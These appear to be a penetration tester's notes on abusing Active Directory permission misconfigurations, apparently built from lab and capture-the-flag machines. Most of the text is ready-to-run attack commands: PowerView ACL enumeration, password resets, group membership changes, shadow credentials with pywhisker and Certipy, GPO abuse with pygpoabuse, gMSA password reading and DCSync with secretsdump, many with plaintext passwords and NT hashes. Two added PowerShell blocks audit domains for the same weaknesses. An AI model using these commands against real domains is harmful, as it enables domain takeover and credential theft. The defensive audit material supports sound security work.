AD Object Security Permissions
- Everything in AD is an object (users, groups, computers, GPOs), each with its own set of access permissions (a DACL made of ACEs).
- If these permissions are misconfigured, they can lead to privilege escalation or lateral movement.


Manual Enumeration
Import-Module ./PowerView.ps1
Get-ObjectAcl -Identity $OwnUser | more
Things to look for:
- ActiveDirectoryRights
- SecurityIdentifier
- AceType
Read an ACE like this: AceType (Allow or Deny) for SecurityIdentifier has ActiveDirectoryRights on $OwnUser.
Resolve a SID to an account name:
ConvertFrom-SID $SIDIdentifier
Resolve every SID in the ACL of one object in a single pass:
Get-ObjectAcl -Identity offsec -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
Enumerate the rights the current user holds on other users:
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Enumerate the rights the current user holds on groups:
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Rights worth chasing in the output:
- GenericAll
- WriteDacl
- See the sections below for the abuse steps.
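Added example, not part of the original notes or of PowerView: a defender-side audit that reads the same three ACE fields (AceType, identity, ActiveDirectoryRights) with the built-in ActiveDirectory module across the whole domain, including GPO containers, and flags Allow ACEs carrying the rights abused in the sections below when they are held by a principal outside an expected list. Assumes RSAT's ActiveDirectory module and its AD: drive; $ExpectedPrincipals and the NetBIOS name EXAMPLE are assumptions to adjust to the environment.

```powershell
# Added example (not from the original notes or PowerView). Assumes the RSAT
# ActiveDirectory module, which also provides the AD: PSDrive used by Get-Acl.
Import-Module ActiveDirectory

# Rights that let the holder take over the object or write the attributes abused in these notes
$DangerousRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight'

# Principals expected to hold such rights (assumed list, NetBIOS name EXAMPLE is a placeholder);
# anything else is a finding to review
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
    'EXAMPLE\Domain Admins', 'EXAMPLE\Enterprise Admins'
)

function Find-RiskyAce {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    # objectClass=user also matches computers; GPO containers are included because GPO abuse
    # needs write rights on them
    $filter = '(|(objectClass=user)(objectClass=group)(objectClass=groupPolicyContainer))'
    Get-ADObject -SearchBase $SearchBase -LDAPFilter $filter | ForEach-Object {
        $obj = $_
        $acl = Get-Acl -Path ("AD:\" + $obj.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.ActiveDirectoryRights -notmatch $DangerousRights) { continue }
            if ($ExpectedPrincipals -contains $ace.IdentityReference.Value) { continue }
            # Read it as the notes do: AceType of Identity has Rights on Object.
            # ObjectType narrows WriteProperty/ExtendedRight to one attribute or right;
            # the all-zero GUID means the right applies to the whole object.
            [pscustomobject]@{
                Object     = $obj.DistinguishedName
                Class      = $obj.ObjectClass
                AceType    = $ace.AccessControlType
                Identity   = $ace.IdentityReference.Value
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = $ace.ObjectType
                Inherited  = $ace.IsInherited   # inherited from an OU: fix it at the OU, not the object
            }
        }
    }
}

# Group the output by principal so one over-privileged group shows up as one cluster
Find-RiskyAce | Sort-Object Identity, Object | Format-Table -AutoSize
```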
BloodHound Enumeration and Exploitation
GenericWrite (see the machine account and user account sections below)

GenericAll, AllExtendedRights or ForceChangePassword on a User Account or Group
- User: reset the password
net user testservice password /domain
- Group: add a member
net group testgroup offsec /add /domain
RDP
mstsc /v:appsrv01 /prompt
Preferably, use the shadow credentials attack described below instead.
Write DACL
Grants permission to modify the object's DACL itself, so we can give ourselves any right:
Add-DomainObjectACL -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All
Generic write on a Machine Account
GenericWrite on a machine account opens several ways to attack that machine.
msDS-AllowedToActOnBehalfOfOtherIdentity
With GenericWrite over the machine we can set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to an attacker-controlled account with an SPN,
and then perform RBCD.
Resource Based Constrained Delegation
Change the machine account's password (works on Server 2008 and earlier):
net rpc password 'ADMWS01$' Password123! -U retro2.vl/'fs01$'%'Password123!' -S BLN01.retro2.vl
Generic Write on a User Account
Targeted Kerberoasting
This abuse is possible when controlling an object that has GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operators group usually has those permissions.
The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
From UNIX-like systems, this can be done with targetedKerberoast.py:
targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD
Once the Kerberoast hash is obtained, it can possibly be cracked to recover the account’s password if the password used is weak enough.
Shadow Credentials attack (AddKeyCredentialLink)
- The basis of the “shadow credentials” attack is that if a user can write to the msDS-KeyCredentialLink attribute on a user or computer object, they can obtain a TGT for that principal and then perform Kerberos authentication as that account using PKINIT.
- Detailed information on this attack can be found in Elad Shamir’s blog post on Medium.
- Requires Windows Server 2016 or later.
To perform this attack from a Linux system, use the pyWhisker.py script:
https://thehacker.recipes/ad/movement/kerberos/pass-the-certificate
https://github.com/ShutdownRepo/pywhisker?tab=readme-ov-file
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add" -e pem
pull 1204 mist setup impacket
./pywhisker.py -d "mist.htb" -u "svc_ca$" -H 132af7136478f26a1b227d08a508a526 --target "svc_cabackup" --action "add" -e pfx
For a machine account:
python3 pywhisker.py -d "eu.junon.vl" -u "svc_backup" -p 'b4ckup5821!' --target "S021M200$" --action "add" -e pfx
Once the values are generated and added by pyWhisker, a TGT can be requested with gettgtpkinit.py. The NT hash can then be recovered with getnthash.py:
python3 PKINITtools/gettgtpkinit.py -cert-pem test2_cert.pem -key-pem test2_priv.pem domain.local/user2 user2.ccache
python3 PKINITtools/getnthash.py -key 894fde81fb7cf87963e4bda9e9e288536a0508a1553f15fdf24731731cecad16 domain.local/user2
Using Certipy
certipy cert -pfx LxLvZ6SN.pfx -password fc3Am4EXoCY2hKxV3ZBe -export -out svc_cabackup.pfx
certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100 -username MS01 -domain mist.htb
(-username is the target account the key credential was added to)
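Added example, not part of the original notes or of the tools they cite, serving the RBCD, targeted Kerberoasting and shadow credentials passages above: it lists every object where the attribute each technique writes (msDS-AllowedToActOnBehalfOfOtherIdentity, servicePrincipalName on a user, msDS-KeyCredentialLink) is populated, so the list can be compared against a baseline. Assumes RSAT's ActiveDirectory module and read access to the domain; nothing environment-specific is hard-coded.

```powershell
# Added example (not from the original notes). Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function Get-AbusableAttributeExposure {
    # 1. RBCD: computers that let some principal act on behalf of other identities. The AD
    #    module exposes msDS-AllowedToActOnBehalfOfOtherIdentity as a resolved DN list.
    Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
        Where-Object { $_.PrincipalsAllowedToDelegateToAccount.Count -gt 0 } |
        ForEach-Object {
            [pscustomobject]@{
                Check  = 'RBCD'
                Object = $_.SamAccountName
                Detail = ($_.PrincipalsAllowedToDelegateToAccount -join '; ')
            }
        }

    # 2. Shadow credentials: any object carrying msDS-KeyCredentialLink values. Windows Hello
    #    for Business and hybrid-joined devices populate this legitimately, so compare the
    #    count and the object's whenChanged with what is expected rather than alerting on all.
    Get-ADObject -LDAPFilter '(msDS-KeyCredentialLink=*)' -Properties 'msDS-KeyCredentialLink', whenChanged |
        ForEach-Object {
            [pscustomobject]@{
                Check  = 'KeyCredentialLink'
                Object = $_.Name
                Detail = ('{0} key(s), last changed {1}' -f $_.'msDS-KeyCredentialLink'.Count, $_.whenChanged)
            }
        }

    # 3. Targeted Kerberoasting: user accounts (krbtgt excluded) carrying an SPN. An SPN that
    #    appears on an account which never needed one is the signal to chase.
    Get-ADUser -Filter 'servicePrincipalName -like "*"' -Properties servicePrincipalName, whenChanged |
        Where-Object { $_.SamAccountName -ne 'krbtgt' } |
        ForEach-Object {
            [pscustomobject]@{
                Check  = 'UserSPN'
                Object = $_.SamAccountName
                Detail = ('{0}; changed {1}' -f ($_.servicePrincipalName -join ', '), $_.whenChanged)
            }
        }
}

Get-AbusableAttributeExposure | Format-Table -AutoSize
```

Writes to these three attributes, like the DACL edits in the sections above, can be alerted on through Directory Service Changes auditing (Security event ID 5136) once a SACL is set on the objects.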
Domain Admins Owns Enterprise Admins
- Sliver C2 commands (sharpview)
A user in a group that owns another group grants itself WriteMembers on that group:
sharpview Add-DomainObjectAcl -TargetIdentity \"Enterprise Admins\" -Rights WriteMembers -PrincipalIdentity tina
Add itself as a member:
sharpview Add-DomainGroupMember -Identity \"Enterprise Admins\" -Members tina
Verify that it worked:
sharpview Get-DomainGroupMember -Identity \"Enterprise Admins\"
WriteDacl
- A user is in a group which has WriteDacl on a group member

The user, via the group "legacy", has WriteDacl, so it grants itself all rights over the user GPOADM:
sharpview Add-DomainObjectAcl -TargetIdentity GPOADM -Rights All -PrincipalIdentity legacy
shell (then reset the password from the resulting shell):
Set-ADAccountPassword -Identity 'CN=GPOADM,OU=GPO-MANAGEMENT,DC=BABY2,DC=VL' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Lacure77#" -Force)
Modifying the rights
To abuse WriteDacl on a group object, grant yourself the AddMember (WriteMembers) privilege.
Impacket’s dacledit.py can be used for that purpose (see the “grant rights” reference for the link).
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguishedName' 'domain'/'controlledUser':'password'
GPO Abuse

- The user GPOADM has GenericAll on the Default Domain Controllers Policy
- We know the password of GPOADM
- Use CyberChef to convert the password into an NTLM hash
- Get the GPO ID:
sharpview Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
or use BloodHound; what we need is the GPO's CN (its GUID)
python3 pygpoabuse.py 'baby2.vl/gpoadm' -hashes f2942fef44f5dac6cd9bf544cba0c6c1:f2942fef44f5dac6cd9bf544cba0c6c1 -gpo-id "6AC1786C-016F-11D2-945F-00C04fB984F9" -f
gpupdate /force
net localgroup administrators
evil-winrm -i dc.baby2.vl -u john -p 'H4x00r123..'
ForceChangePassword
If you only have a plaintext password, convert it into an NT hash first (pth-net takes LMhash:NThash):
pth-net rpc password "Nina" "newP@ssword2022" -U final.com/adminwebsvc%b0df1cb0819ca0b7d476d4c868175b94:b0df1cb0819ca0b7d476d4c868175b94 -S 172.16.225.181
AddAllowedToAct
Resource Based Constrained Delegation
ReadGMSAPassword
cme ldap 10.10.103.222 -u 'thomas.powell' -p 'Password123!' --gmsa
GenericAll on a Group
Add a user to the group:
net rpc group addmem "SERVERADMINS" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"
pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"
Verify:
net rpc group members "SERVERADMINS" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"
DCSYNC
proxychains -f /etc/proxychains4.conf secretsdump.py 'work.junon.vl/hd-fstewart:DEQ8mC2xxTzVNB@S021M005.work.junon.vl'